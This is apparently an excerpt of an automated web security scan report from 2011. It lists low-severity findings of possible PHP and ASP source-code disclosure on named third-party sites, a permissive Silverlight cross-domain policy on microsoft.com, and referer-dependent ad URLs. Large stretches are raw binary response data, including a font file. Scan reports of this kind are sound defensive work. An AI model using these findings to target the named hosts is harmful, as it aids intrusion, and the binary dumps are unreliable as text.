...h......'.....V.]6..|q.ct..v....=Y..Z...b..o.6.C.....[..)......Y(].78J-D.d..=.{..ECa...j..*y.GTS.zE..!.....$..~S$.s.oEI.......(&....H.p\}:.    1xo....4._...{..9.J<A.Yu....3.;....W.l...=QL),Z. ...X.._[."L..4.Z.}.#/.p.......,`K.4Xb."C.4....-c_.+8J..I..~[....O.....$.....Qw_.MXmi..<6.o_...K(....6.)..C.]l.u.Sa..(./..J..kH.    . N....d6...j..6.M..W|.Y......NT...L.Ob>~t.[...n.^.....-....I....2}Tm.~.:..TM.....tU...T.G66Gh.=]4/.K.........t.fm.....AL....Wf.Paj.:*aK~...C..)(.h....^D..N.5...@o.,.(......m..mfV.i9.;.......$+.....|.%[.K...Lz.F....Mh..}.JDH.G....e..OLj..\.D#|V`l..u@S...8Pz...\i,.P2...qU..!.X.DV.\oF.^..yG...q..w..Z..
..=..B.K.UM...!...w....LWD.....j...X...]........l..m$}.....5M....$o
....A.'..y.i.o..@........{......P@D...6.[.=.2.Ws...'.0..H.2...G;..jM4...4;uk....F}..i.....    My...
u.|C....=[4.V.wW..$.......N.'h&+I..jU......w..Nh.Rn.Z;..4........Fm.q.M..G:..._....*0..E."0.....!\...p2    ]#/.... 3......;!.S.>.%...Ty..9.lK..:wJV....vF4.k.T}....z6.{'u...._l.E........r.w......W...a.........y{.K.W..k..l..*..].k.n.<].b2.:...{2.....0p.............W.2...........Vj........6..{.2...9..{l.....I....^......q....V...q.&r.....U...zj=....qX-\....O......,J.....#%......t.W?b.,....O...;..G.)|.Qd...v..Z...w........'.......z3z..Jq......@.{`..,..!.y.!.3.....i.+%c........    .%.o...:.9.1..e..........4\p]" ...P......RO.Tl..N@|6....x.v....}^((.s...$Gp.{...w!.I..~C..+....u>....kM....[...
<i....nf.eP-l.~._68..E{~ 9....]...1.......u....d0~N.0Q.....\(. ..vts...4...h.'....S..\...........K&4.....-...\.ds...Sy.Zq.Q..H.Qx......t..jx..h...\....x..H.d.5.J.....x..DE./...&.......d..OB|-
......8].....B...M)h...R.J..-...1{...g..z..)............("U..*.....S..G..~L.x..+9.iv.a....~.E.V...\N.......p|Z'.^....i.}.-.o.K...jK..J.J.G.$<).9....]w3u.`..>......R2H'ew    L.T$....W>$d..L.D..z.....Y...w.....C?j.^rG^.-R.4....".'..8...E<h......r;&s.)Ym.......0q..$nc..?.,.t......K..q.<.T@)..H.B..r.v...i.....BK....z..X.~8If.q.U7W..u..%.@D..c......HB....e.._..`;
Nh..12.).[I%.67..."
NHr...y...N.Z....I......Z0.J.V...kL..g.    a.S`...".... ..m......s..H..h&.....d.]...*......aJ.H..M..J.\...R...G...... 3..^..$....Z..~..B=e......-...Fc..$\......<..c6..|...J.S^.....Z....3...j3...8-..;.....U....8...).`.I*`......'I.f.1+...L6g..w;..`/....{l../X.)....    l...!...n}.T<|.T.........4....z..*I.$.^..bV....oo.o..y.<6Q...j......c...8......+..$..l..j.)..(.x..{.......(.......M&.....d..r.+.......[....C.F.c*kQ{ZP....l.|.....-.....L.H.R",...D...lo.CS.    .......Y..,5....U+s......k..4.nb.o..........AW...c.E.D.. q..I......%O.4.....j...#.c.b...Lw4.#.-~X%..8f..j.....Z......-......4I..@...<.. .Jn...!.b.)1...b.X..#.V.K......Qo.;..M...N. \.y..8O..sE..]....*m.x.....k...............'J.[(7}.K..}....?..X/..2.
D...X.K.]...5..b....7..lFb.v._.<.%.s"@......z....#....^.......).....bO..F...5.?..3C....`qI|L#........q.....N>..r.....CS..T".>R8.B.3...3g8S..8@."^...W...h..    ....=.`.s..[........w,n;.....e..J1
..f=n.;....7$D.".q........F.C#&..V{......]Y.L-..X`.d...~=._2j.?.....i.10,...SN.x...._8.t.+..0.).;R..fo-..e..\V...~.~...q....-......V....{.4.q.>..._>Z.C...
e..M.R.<o..h.....O.&6~../.X^....<..15..m..Z~8.Z...t.Ly.w..G.i#.f.O..T....".LnV9.v.J....h....4ao.-]X...'.....$..6.+....`,.....K....Z.O;.n..Y...In..w.f......O........=.C.-.....X.5c.f.zs..R..6....)wW.....~N?.C*.S..:.)6.2....d r.?.|..X..y..a.w...._3.hbZx..FBdxK\...w..).|.......)K......6...L.;.Y..c..>....[.bQ..Q.&f.X..}.....I..
..7..U.
$.........y.X.X...`..u...'N...W,...-..
.-=..y..UV6...e..h .0.$......
C....A+...........*LUw.......HL.....7W4).^?......3
.L...k
~K...(.....A................W.S^4>..%.\V....w|...p.....-.........r.
....3.>\......t.;~B.c.F...&    ..-.....qq>.....o....jzO."...    Da+..AW.Lb.Y.    .R...X..*.7.HF..L>...t.
....({~......s.>n2...M|M.."}.2;.........[M.@O.Y!.4U..........&.>.S......T..A..r8..h.K*c.6K............,.j{fr...GE.k.d)vf-..I[......6^t.X|.....].U.>...uo.....O.... ....}.#$.C..f...h....b..!.......Q.....$..    ....h.3..5.......)...<a../Ft25.?!},..
(.Vg..}/A.h.n~r..c.~.."5..8..;....L.GI..".""F..C..;%N..w..4....R..1Y. `..V..Fb<..d.pJ...6...c.K.r.....Be..#.....Z..q...%.e&3< ..T)Y.1.........B.P.....~DVsA....*V.
y....g/..fo.....+...3...I....H..3.$,#.J.......I.V.6W"HU.f..5k............o4DF.~.|;l............._+9:=rb...b..!.l.J...
o...@,%zL}. ._.....'s..N.....v.5.2).D.0.n..z{....j.......~~:.{q.+....U....1.&lW...3....c.....q&......"ip..........%(c....2.G....!...>..bX2...e........S.\...n...xu#.h....Q.....>rQ]..f.....+..3..b;.8.    .vFh...p..c)6&.......$<.7.....LC..Z..e..$.T......n.#..O...M.....0<;.3...J.......d......&......xs......
C.....){.7|...+...eE..f.Fb.\8A.w.....K.tw..[.UW .9..S.!%{F.....a.J..&.../..i..,,...|...nV.Y..%8..>.y..............Q7....k...qs.O......3;..S...h.j.a?t-p.I..e....]...om..J...<#R;.+4|........F....N.O....t0M..2...C..k..r].rr....z.wY.r#...:7A..........    ....<RUKM..1.k....l.    ../.%.....5....:.p.w.....Nh..x.. ..a........~i...f.L}.."(*lh../fjpG1..YA.&.....7...O>..|...^qt......#....k.).X.....[\z.@a..R.N........../F..jd....8Dc,_.U.%.J....wb,[.m.B...W.`V....1.a.....`.s...s.r%...WX..]...G..m......(..WX...F.)o...._".r..BSG\j......7.6b..9............H=gzM......E.c.;#.H.....3..>\.~L..6G...c.+.t._..B..%...<L..H.....O.p.~.;...j\G5.....Q.9].. @.I;..`..`3
...`........".mC.O....Ed.G.YD`Z...2...!l.&..}......)..iK..    .....$.@    ....|9u..Q...)Bk..z.n.....LH..muT....=J&i.....F.E.D$....8.5.#A.`M..*C...~B..z.h#...+..D..7-
-.S.,.'R6:.M5.C@h.......n).........v67..y......$J.Sur:....i...T.%.fER.#>..e:D.. ...!..4M{.#. ..O..WR....Ju...n.$.
.t......J....nt..G.[S....W.Uu..%.^.S......W8..;....t.[
..2.t.t..S.Owr.=..R..O......d.<..Ae.
B.....J}.q...u.g\..t.3....#..H......;....6....+.......H.(*...T.c=[r_..aYH!.z........J...ji..5.k...(H.{`.....p..L/..x..o..B.....3.<...v..Zq"R...5.......wXp.O..$2.E5..P*.
..M..>U.o..`..x.*#....Y......P.l.... c.<.I~...@~-..M.....cc.6.V.m....k.y.....~.c(('.......b.v[|. .)].$AbV^..E-p.K4.9...M..:.X3...#'.']2mty....w.|q*.....H...%........x"....R.....Ao..?.?Q$@t.m6.q...i.9...."^z.....X.*...c.s.P=b.pXV..=?.....n"..s.....*.;L..y.
6^A.......g...Y....a...<oq...6u..8...h...{....qA..U.\.w._E.I.2..d
...d,k.S.vwW/.5K..mJ..?...<..K..I..I#...:zb...Y....J.:.WM..a9........l.........vj<.z...L......5.q..uBV....4\@..~....1X...x.....1i.bQ..V}...Bt...y..    t..6...<.dALY#..C.....%bj..v..w:o.kK.X\".E....I..1.S.......{-...s_....T...4...p..t...D....<....M.8..^'.D..W..>..e<.ya.-.J.V....&{..1._.K.f'*...3.0...?.".hXt...T.0...M...[j....c.5.. ..M....+5.....Rn.I..g......$..M5?.    ...d^h.b....sA..*_......\.."i.m...ayH.U+.^^..i.%.\u...k..c.`..z,..x..].x.#>.=.Z....QL.    J...    Q...!.?y.....S..j.@,..^.I.N.`...+.....yi.._1...2..NB3_[..;..D....sD7m...k..k.!Hxd.@.4...w...t:....."[].....t.}.?xhF..hjS...!.t..D+.....@._....(...H?qF..n.{[k......... N.bP...5....9. ..F.'...y.o.....:...4......P..^...fQ.j<^..-.{.X...Lh.g.......W....tL.@C5...7...-.....!..K..l'.h..0p.6..65
y=)..)o...    B...j....s..#.D%B&......i.}(.....).2.3.'.u.F.uM{.(/.@...*........I.....BU..`.....t.v0........[.&H...G.....{[6af...<..1..8..M..`..|......a..e$`..WK.......|P?}..|>...f.!..W........Z...|.d..(.....C"tU]f..X.T\...a4..$.H...U.............!j>....M<0.X+..j....!..C.rR....p*$...bWo...B..V@0...................Ia..4.\.....T..,*.V....T-h.-s...e...8.n..Wc..X.9c......UW..}.V}.....x.A...%J..2.h....    L...y.S.j1.....E.....{VI.T..../=..S..S...G..qG
.:l...u...1...*.;....%).2./._n...R.z.c..8$N...........v.U..H.&&u<vg~..8..M.P.>......b.N..."1
...L.G.1v......0fc,Y>2^.[....PXk...1V.k....*i..$.4RF.f|$..`~R..,..LQ....8.4..g+0....w.KW......Fx=.......,..6.o..H.pe..+.
........HBs.....|PR..6...{...N".]....\2..6-'H.6..<...
.;1.....q+YQ.;....f..hM...J.X...Z...0...qC..............5.{*....t........eh.....m3>}.......X...9.J.Y.._...,y!.E..pd...Ek.R.w..&.W"..1.:.:.`.P1)V.oM.id..(B*b..    .[E.../....~.,.....    .C.k...o.&...D..DS.?.;t.u.b.vr..    2..5.)..M.04....(..<X`>.).I65{..I.jv9E..omAI+.Of+.h...S.T.U}.5.{Z.=....#.S...K........x...A..E...fE.*...:..W......Uo.m....=?.*AN.3.~.*...:O+w........~..y#..rv]6.>..1....~...".O.......@.Ie3..b...c.#.....y`...s
..H.b.....aU..T..2|...$r..F..~......R{xP.{..}/t...Oy..:41..h.|L..:...X.7.J.N...._...r.G.&.|..^$..............E.`.    .y...TK:..Z.M!..?..9.x......C...N.p.....LkD...N.Gk".._...O...X.K.W..m1L....X.....3"..RlY.$.y.&.V.`..Rf.k....h<....TQ....z...}..h.`.,........D.......o...'.2]P....h..Y+Qh...b.?......    !v.2K.:.TM..g,..d.........f...../.......?E....
.G7(\.A....]{<..tP...J..2......N R.sZ.a....O......+.Zk..m.(X,.~DO..ISE..^.....F...T..W.$...R.A~..!.....g.e|/...kP..;......J.].,..h.4......R.....T...r. %..Ar.P;.{C.N'.1.n3..&Y...k .tp\*.............%...}..C.:.%......%..$..q.....]..?).91..x.....W..pO..(.k{.....v....GU.$..$.W....=.....S.f(...z..M.Q...].$..I.m.L..u~..vF.r.T'..j&.<}d....4..h=...`..E...XQ..Q'..{.D....=.....%u..K..+..m....S........#...i..i...&...1P.9=.....=....@|.....C..Ws`..........2&j.1m..=..Ga..-N...(-......(t..n.cz.....S-....v.......P...Xc..7Z..t..A.fp...^bf#......j.uJ..R...0.[...*...nDj...
...q2    .mjs.0....<.<(p..1......9..........i..G....cU+L
o.-pn..W...eR.Q.{.....^Ihd...,...#.........,....99..I...qF.+lw.Er..$.TSg..m.K...4n...4g...,^..1 ..O.5.?....bN;......./....q.....
....j..%ic..g....C.}`..wGFKH.../....*.......VT.....;..S......"B.j.....
.............`..1!.}...M.....J
.T......J\......0F.$..Z......7.t...l.    .D...'..oL....K......u....o...t.$.r...u.39...L..J...-
R....A....................a........"(.....~4..2BUGY......G.-....A..b...~.O..`...U.. V..&.......5.^...W.....0.....y.S........p|-..    }.w...g...f+uK\S....<.....!,,8..y;.x.P...:.*...;...9..f....s..K..0.i..W.2.....24.......!.L&34.2..;*...S...r...R.t5....>Xw.~'q....]8.Q..Q......H..m.L.L.b-m..`a ..*v...+R........2X@s.....F:'a..7    ...3L.    &....s...a.N.\c7....]...n[..ba.%.E.:....^.\#.7l...JF..><.....ze....&.......D.R.%...o(R.*U.......?[^!.    .C.;.......4..h. Q..'..C.... .C..8....#..\<..........s.....].......]bw....a.S....|f+/hp..Zs.H .l.....B...g.O.U.
..(.ve.FVz>..@.j.J.L....b..bW_[.-..31K.G..9........J.    ...-...d.........CK.....)...9/#.....P.!..l..) U..?....,
...&.......Yx`...G.
.?.!.........8.;n..M.J.q=\.......s.KU...JUd...8._$.....vU.........4..... .g..B....g.*]..p.f.;..M.5..L)....@j....EY.bqr.H.u...=.....ff.s.....s...{....#....N.)    b.;...qJ9...Tk.v.t...&...L2.'v.5)5...c: ...A.c.PtD]o.<.[../....G.l.....3..........]Cr..x.m.t...g........S.p/k.....(.8....M..w.<7...z^Q:..Eh..b..N..M...@O.A...3...!..S..c9.....C..w..    B.~z).%.8/+.T.
...Tn.....k[.Z.....A!..r..7.p.....a."...|*n.......-`$K.......toZ.D.h..o.%..Q...$,#.'pTmK.........:.....T.6..kpQ..q...`b.......u'_9.4.......`.F/.,....<v.rN.@.........R...:..I..`.S."~.......`...L.A...~....._2..l.*.C.%.l^..(.....T<.?..6w...    .#GC.h.\.....p..l....bY..A.........=...R~ic%c..*K....
..k_..\......g    ......W.^..22.L.!......4W..TNAn.[hgT.0..;?.'.Z|CB./.....U)....,...-.x.."..k"L.....G.<...._.&.Q.....cWo..i=.=py..O...&...u.M0...1.pZHvr..>.$.......\....t.N.Z........%..Kl$...I.....N
I|7..|%...?.nK.hp.!.."...}.... m....8..&
(..c2.....C3..&G1..'.CY....N..k..?....+Y.."....S.|P~j....I..<h..g6|2.=....._...T+....p..^...TIF.J./...D.>3I..Y?.6....5..v...2.....`..,Me...C/...&......V..d .[HH..h2.vg:Q..F..;...W.ZVoLN*^G........r.b.!...._.a.Z.j...kE..sm    ..".0.........2.....\w.Y.,
[rr.Q.v:.1.IV.....e.....~.    .$O....9......a.2........w..4..|X.B.=.\.s.M"..........b6.D..Y.?{.(.....
..x.1...u..c.d~.Y#Ha.....w....)....3.;...s.G.hO........X9'..{B.m....Y..V..;.?.....M((Y1.MX>H...b...cr[Jos.G...........H.Z..tp./.v    ...%1yV.1.C.aN..=...]h..q.+O`c......O.C.gU..C/...P*."...)......N.I.m7..\......G..=x...8.5.....l...p5.{.@u..L....K]9...Z..+e.....fS....tY.....n*..K ..9e.>Yb./...|...V.T... .u......O.fG.9.....<..q.7j.JN>.'..b..ot..gA.9r..$"..t
..o..C.......d.Lw^......2z..CF.s....J2c.'...].y..~...2.U.._...5S.=8/2u......{A.%..{G..&..F.....X..Y...2...d..G.r$..z..~....1.R".    8;3..K3.{.......    uv...C.....[d..FS...[Mw....._...........Y?......J..w.Z...8.W0Rh.C.|......l. ..N....d...X.<,..iw}...E.............z...m....&N.*N.X.    k"K...W}I....0.ZX9o./Yd."."..[8g.;.Vp..l...._.N.2.t.pDDo...f).......m.'..:._..e ..=....,Y....En.5.@?.X.&.q.../q. TG...I.+l.~.h6...h..&.....}^;2]....x+..GT.1.5Mcs/........a....q$kK    .    -......,DK.e........[...a.v.x..U.WX..t...>..b.F\..1..O.4<M.\b...{...m.#...0..b...5.!.).g...M72.z=..4......L...]........6...";.Y'............R....H..D..H.......BaA.G.q.{..~.~....P..w...E..0....i.iha.%G..%.DE..\..&....L7...N~....|..(.Fd...+...]o.K@...Y.....d.........d...rQ........&.../.e*V.......0i.*..P45.?!Nxs&.xyKM.|w.....oqK...........Q.l...|x.U...O..d.HO.[..I.?v..L..t...C..7f.G..0.i:l...bF.zm....'.lV>.Q.}.`;.......DD.......w.GE.....>B....<_..g....-.......]+...,~.,.t..h.......m..cQ..Xa-...%..C...&.v......&..lJ................ju.*8......8.._B..."..=..fH..]xX=.&.GX.y..-..q...|...J..I.au4}..j..........a.n$e].?3.N.b.......>.&....."..A.....-.0..|.
M..+sr2.@#...{.0...k..$o{..B..2..A.|4._...a.'..9...o.5I.eF...5.E>V...y`q;.........n._+.DC.!.':...R......7..t.i.....z...te....G.E{r.Db....N.......kU..i...    l.QS-c......]....../....F..)9_.=M>UO.t7=a9..o..........x~g......"...j!.\p.i..$7}`........w.k.f....tu.i..q..
.5F....i..k~.{z..).`9.R..(........J..Y...+..@..tf.wcbR...7.j..iwX...[MsW.O..gH.....k.?..!..
l..,s.!..l%..Q...[.K....tB..L..Op_..Y.+o..D....JI.O....{....r..s.l.!    .N.....vo.S..\    ..W ..!..}..d.Wr...........=.......k\oz......%."x.......&.B...7Ls.[.......(s...H.pd.C.^.%......:GM.S'.Q7..'.....VA8....}.k6...N..D'!.....y.wk?.I.4.}Ok.A..^88..4.h..'.....T....9.6/'4.....=:X.[.G.0...~...*x....X@..p.Wx.....S-...,./...>.%...M.+*..a......r}7    S...E.D.>.....2#    t_..z.....%.w`...O.Cr2..Vk.mN.....s..4................K.c..>:;.Z.7.(......th..%(xSD..pM...O../a......C.}Y....[~...g..e.. ....../L.p.......O..AjL.....![.i......t4..........^!._:u    .3.'...`...?.!...@..M......#...>...j......dw..<}&..(...........^.E.b..x.z.4W..Z...y...4.L..... ....Y....'......f+...(q..^..*.5*.ZnR...K...%J..zM.c%'....k.=l..Q...7n.....L.+e.V..t*6J.6.x..u..bv.__.8......l.C..    .c....-../@..{(............x.!.].......
8.w...M...Y.SX..XL......J/..M..`.~M...br...O0.
....g...`?N..Z.|..u.,.. ..D..G.....{...An.P..^....#....T8.!...&.....M..].z..t.._..._....A??.."t&..gJ..j..r|{.:..;....B9...!Sal.T..A..l.E,...0.....(.w....+J.Ov]H}z..g....@...    .5.[/k.....g.$.J....af){..L..+....s*....&[=!.gV...|5....z...|..vzxQ ..9k..... Sn.`}q..x(......t..S'~.......F.C.)Mb.E.....Lw...G.....en.k...#9...%.....G...K<N~R.....DY.BZ.Frr.,AY.....zaC)!.:......=....A&.....
d...    q.p.;l.*...^B6W    .{....g....U\.L.......+.?..`(...eu&............d.mB......yO...R%
.../..u..q/{....~.:u.ipCpV....P[....    Ys..q......m^POi..Y6S..6..*..(...)../MB..3.......t.y....O..G.....G....r.`.#.......m......x..'....7?.......R..5.M....m.E.ut.XB.<_Of.o...^..."f.x.. ..............,P.....eJ_...b.e9.....n.....U2...........V.@.P..E..C..`....#j<.....a..)..f.....iG.Y....i...{.L..u..%.r..`,..WT..p.(.u.C..c....:....f.`Z.\t..
S..j.......-.F..{A...DX..7.EI........S.)....d'.\F..V.H0.@m6...45...ok.cA.}D w).....2H.4.........TB.:....%"..*u=.Py..-....Y.....>.u..s..;d..U.L....j..':T.N..&..U....A..s..Y...#^b.@...u.i...........a
..1.&.....Mv%.D`.9....5...8..(*.Z..c.r.Z.O.,.0.>....7..?..vc...^9.*..?A....BH.e....-.P..i.wS+..i6....zk....?>s.....l-....C..r..S.......k.0M+%.)...:\.iq00.....mO@.(AiJ...5.....1#n..2S.B...p.2z.k|(..KL....Y..E.....0..qe@x.m.R........u..E5=.B...S..".*..if.......YT....|+`S..'...}l| .I.s.Ia.....|.....i"...i8.?.EM
...[SNIP]...

16.2. http://meyerweb.com/eric/tools/css/reset/ previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://meyerweb.com
Path:	/eric/tools/css/reset/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /eric/tools/css/reset/ HTTP/1.1
Host: meyerweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:42:56 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 8737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>CSS Tools: Reset CSS</title>
<meta http-equiv="Content-Type" content="
...[SNIP]...
</div><?php if (function_exists('_mw_lt_update')) _mw_lt_update(); ?>

<div id="redesigns" class="panel">
...[SNIP]...

16.3. http://mozex.mozdev.org/index.html previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://mozex.mozdev.org
Path:	/index.html

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /index.html HTTP/1.1
Host: mozex.mozdev.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:42:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.12
Content-Length: 9384

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<title>mozdev.org - mozex: index</title>
<link href="//www.mozdev.org/skin/winter
...[SNIP]...
</table>
<?php
$dlurl = "http://downloads.mozdev.org/mozex/mozex-1.9.10.xpi";
?>

...[SNIP]...
<a href="<?php echo $dlurl; ?>"><b>Install <?php echo $dlurl; ?></b>
...[SNIP]...

16.4. http://www.addthis.com/bookmark.php previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.5. http://www.addthis.com/feed.php previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.addthis.com
Path:	/feed.php

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /feed.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.6. http://www.kbsp.com/x/fonts/AKZIGBES.TTF previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.kbsp.com
Path:	/x/fonts/AKZIGBES.TTF

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /x/fonts/AKZIGBES.TTF HTTP/1.1
Host: www.kbsp.com
Proxy-Connection: keep-alive
Referer: http://www.kbsp.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:05:18 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6 mod_ssl/2.2.9 OpenSSL/0.9.7l DAV/2 mod_jk/1.2.23 mod_fastcgi/2.4.2 mod_scgi_pubsub/1.11-pubsub mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Wed, 20 Oct 2010 17:04:42 GMT
ETag: "97916-c528-4930f67cb1e80"
Accept-Ranges: bytes
Content-Length: 50472
Cache-Control: max-age=60
Expires: Mon, 24 Jan 2011 22:06:18 GMT
MS-Author-Via: DAV
Connection: close
Content-Type: text/plain

............GPOS...q...0....GSUBy..........xOS/2ms}>.......`VDMXm.u....H....cmap.@{........2cvt ..
i.......&fpgm2Msf..
....bgasp...    ... ....glyfC..]........head..lo.......6hhea...'...T...$hmtx.e.0....
...[SNIP]...
........
.........9.y..:/..;/............:......../......!...!/......"..."/....../.......EX.../......>Y...EX.../......>Y................4...01.53.......#"..'..54>.7>.7>.73............32>.7.....#.785..4<?........+...
......!.
.
........ &..........;!.........<& 1#......... #%........    ...#&........K.-.....$.........+....EX.../......>Y......01..#'.L............K.-.....$.........+....EX.../......>Y......01.3.#Y..............J.T.....@.........+.........9....EX.../......>Y...............9........01.3.#'.#P.h.)(....BB........H.W...#.=.........+....EX.../......>Y...EX.../......>Y..............01.>.32....32>.53..#"&'..#"......%...".........Z.    .$..*.........L.0*..
.....
   ..2(..............].j.....$.........+....EX.../.....>Y......01.5!.0...]]]........>.:.....;........+....EX.../......>Y...EX../.....>Y............01...#"&'..'3....32>.45.:."<2.,......r........32%    ..$%!
..............I.].......$.........+....EX.../......>Y......01.3.#I....w.....].j.......[.../..    /...................../..........EX.../......>Y...EX.../......>Y..................01.3.#'3.#........www.....-.D...".....7.. /..!/.. ......../......!.................+....    ..+01...32654&#"..4>.32......#"..x........K..(..(....(..(.............(....(..(....(.....5.&.......H.........+.........9.........../....EX.../......>Y.......+.........../017..>.32.......#"&'7..32654&#".7/...**
.<.."..............1..-...    ..7.......$......K.........S.......+.........9.........9....EX.../......>Y...EX.../......>Y..................01.3.#'3.#..............8.=.......4.......+....EX../.....>Y...............    .....9013.....3267...#"..54>.7..%$.........(....#..(...../.    .....#.........J.S.....C.........+.........9....EX.../......>Y...EX.../......>Y..........01.#'3.73..g.)(..J.BB...&...................+01.!.!&.c.............A................+.........../.........../.........../............EX.../......>Y...EX.../......>Y...EX.../......>Y........+.........+....................01.>.7>.7.....3.!.!.!.!.!.!5#.#............j.v.....,...h...3....)..2.. &".....k...dd.......n.x.....9.z..:/..;/............:...(...(/............!...!/.."......9......%...%/......3...3/....EX.../......>Y......!..+......6...01.........3267>.'>.7>.32......#5..#"&5467>.7>.7..#"........
..
   ........$$..UQ.....2$<?..
.. ..#..................    ..].$....4=.        ....=..,.....................!.......C....D/..E/..6...    ........../..D......../............./....EX..&/...&..>Y...EX..//.../..>Y...EX../.....>Y...EX..;/...;..>Y...EX..B/...B..>Y..;...........;.&..9..&...........;.&..901%..3267>.54&/...#"........54>.7>.32.....7........#"&'..'.'.-.+'-5. .....7.IW...    ...
.-" CB@.$9..%...OBS    ...(Z.h.D&/1.LB.... V-...W..ed.'...(8H."KKJ .$........KGN'5E,>.qJ....HF..........A.....2....3/..4/..*.........3......../....................&...*.........EX..'/...'..>Y...EX..!/...!..>Y...EX.../......>Y...EX..1/...1..>Y..,...-..+..'..........................9......)...*......./...//..0...0/01...#"........3267...#"..54>.32...5!.!.!.!.!.!....)    ......NE&9.    .$/.O}X/;`y= 1$.    .....,...e...........S*[f......8c.N].\-    ....i...........i.......(.P..)/..*/..)...$...$/........*...............EX.../......>Y.........+..........01..........32>.54..'6......#"..54>....    ............0K3.!6G'/F/..,F.o....#.........    ...\../B(/D+..0@# ?3!..................t....u/..v/..u...]...]/..v...8.....].8..9..].........8............../....EX..%/...%..>Y...EX..0/...0..>Y...EX..K/...K..>Y...EX..U/...U..>Y......9..+....9....9..U........0............?...?/......g...g/..%...o...01%.........3267>.%4&'..#"...%>.7>.32.....>.32.....!.....32>.7......#"..'..#"&'..54>.7>.7>.74..#"....u......(.....*...U...+............jR.;#.....%0.1f-. .......2.."......&kN(=.!..+8D).,.+1....$...#...;....................    ..*u...........6..,....    ... ,.?><...    ".....G...%1..        ...../0)    .+(".......
...........*........./.........+....EX.../......>
...[SNIP]...

16.7. http://www.zazzle.com/netlingo previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.zazzle.com
Path:	/netlingo

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /netlingo HTTP/1.1
Host: www.zazzle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17. Silverlight cross-domain policy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.microsoft.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.microsoft.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Type: text/xml
Last-Modified: Tue, 12 May 2009 23:10:10 GMT
Accept-Ranges: bytes
ETag: "c4640cc56d3c91:0"
Server: Microsoft-IIS/7.5
VTag: 279991242800000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 14:58:56 GMT
Connection: keep-alive
Content-Length: 572

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from >
<domain uri="http://www.microsoft.com"/>
<domain uri="http://i.microsoft.com"/>
<domain uri="http://i2.microsoft.com"/>
<domain uri="http://i3.microsoft.com"/>
<domain uri="http://i4.microsoft.com"/>
<domain uri="http://img.microsoft.com"/>
...[SNIP]...

18. Referer-dependent response previous next
There are 15 instances of this issue:

http://ads.dailystar.com.lb/www/delivery/afr.php
http://as1.whdh.com/pan/adjs.php
http://as1.whdh.com/pan/adx.js
http://as2.whdh.com/m/m.php
http://as2.whdh.com/m/m.php/1295906165143/m.gif
http://as2.whdh.com/m/m.php/1295906189027/m.gif
http://as2.whdh.com/m/m.php/1295906202010/m.gif
http://as2.whdh.com/m/m.php/1295920516924/m.gif
http://as2.whdh.com/m/m.php/1295920639137/m.gif
http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction
